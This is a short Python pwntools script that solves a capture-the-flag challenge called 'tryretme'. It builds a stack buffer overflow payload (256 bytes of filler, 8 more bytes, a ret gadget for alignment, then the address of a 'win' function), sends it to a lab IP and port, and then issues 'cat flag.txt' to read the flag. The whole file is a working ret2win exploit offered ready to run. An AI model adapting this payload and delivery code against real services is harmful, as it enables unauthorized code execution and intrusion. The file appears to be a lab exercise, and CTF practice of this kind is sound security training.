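"""Solver for the `tryretme` CTF service: overflow the input buffer and return into `win`.

The payload shape is fixed by this particular binary: 256 bytes of filler,
8 further bytes, a lone `ret` gadget, then the address of `win`.  The remote
tube is opened with a context manager so the socket is closed even when a
recv times out or hits EOF part-way through the exchange.
"""
from pwn import *

context.update(os="linux", arch="amd64", log_level="error")
context.binary = binary = ELF("./tryretme", checksec=False)

# Challenge-specific constants; both the offsets and the endpoint belong to
# this exercise only.
FILLER_LEN = 256
EXTRA_LEN = 8
HOST, PORT = "10.10.170.21", 9006

rop = ROP(binary)
# A bare `ret` ahead of the call target — presumably to keep the stack
# 16-byte aligned on entry to `win`; confirm against the binary's prologue.
ret_gadget = rop.find_gadget(["ret"])[0]
win_addr = binary.symbols["win"]

payload = b"A" * FILLER_LEN + b"B" * EXTRA_LEN + p64(ret_gadget) + p64(win_addr)

# `remote(...)` is a pwntools tube; its __exit__ calls close(), which the
# original only reached on the happy path.
with remote(HOST, PORT) as r:
    r.recvuntil(b"Return to where? : \n")
    r.sendline(payload)
    r.recvuntil(b"ok, let's go!\n\n")
    r.sendline(b"cat flag.txt")
    print(r.recvline().decode())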